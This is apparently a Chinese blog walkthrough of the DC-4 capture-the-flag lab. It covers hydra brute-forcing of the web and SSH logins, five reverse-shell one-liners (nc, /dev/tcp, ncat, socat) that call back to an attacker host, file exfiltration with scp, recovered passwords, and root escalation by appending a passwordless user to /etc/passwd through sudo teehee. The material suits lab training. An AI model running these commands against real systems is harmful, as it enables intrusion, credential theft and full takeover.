DC-4

DC-4

Posted by Kyon-H on July 10, 2025

1. 信息搜集

扫描网段发现主机 192.168.163.135

image.png

nmap扫描端口,发现http和ssh端口

image.png

访问网站尝试登录失败,目录扫描无重要内容,尝试爆破

2. 渗透测试

2.1. 登录密码爆破

bp抓包查看数据格式,可用bp爆破或 hydra 爆破

image.png

使用 hydra 爆破

1
hydra 192.168.163.135 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

image.png

获取到密码:happy,登录发现命令执行页面,抓包测试发现存在漏洞

image.png

image.png

2.2. 反弹shell

上传反弹shell命令

1
2
3
4
5
nc -nv 192.168.163.135 -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -nv 192.168.163.132 4444 > /tmp/f
bash -i >& /dev/tcp/192.168.163.132/4444 0>&1
ncat -nv 192.168.163.132 4444 -e /bin/bash
socat TCP:192.168.163.132:4444 EXEC:/bin/bash

连接成功

image.png

查看home目录,发现jim用户下 old-passwords.bak文件

image.png

直接复制或使用scp传给kali,kali需要开启SSH服务,允许密码登录

1
2
3
scp -P 2233 old-passwords.bak kali@192.168.163.132:~
# -P 2233 指定SSH端口2233
# :~ 将文件放到目标机用户家目录

2.3. SSH爆破

使用 hydra 爆破SSH

1
hydra 192.168.163.135 -l jim -P old-passwords.bak ssh

image.png

密码:jibril04,su jim切换用户成功,查看mbox文件发现是邮件,查找是否有其他邮件

image.png

/var/mail 目录下发现邮件,其中有charles发送给jim的密码邮件

用户名:charles 注意是小写 密码: ^xHhA&hvim0y

image.png

su charles 切换用户成功后,查看用户目录下无内容,sudo -l 尝试提权

image.png

2.4. 提权

teehee提权

1
2
echo "shell::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su shell

image.png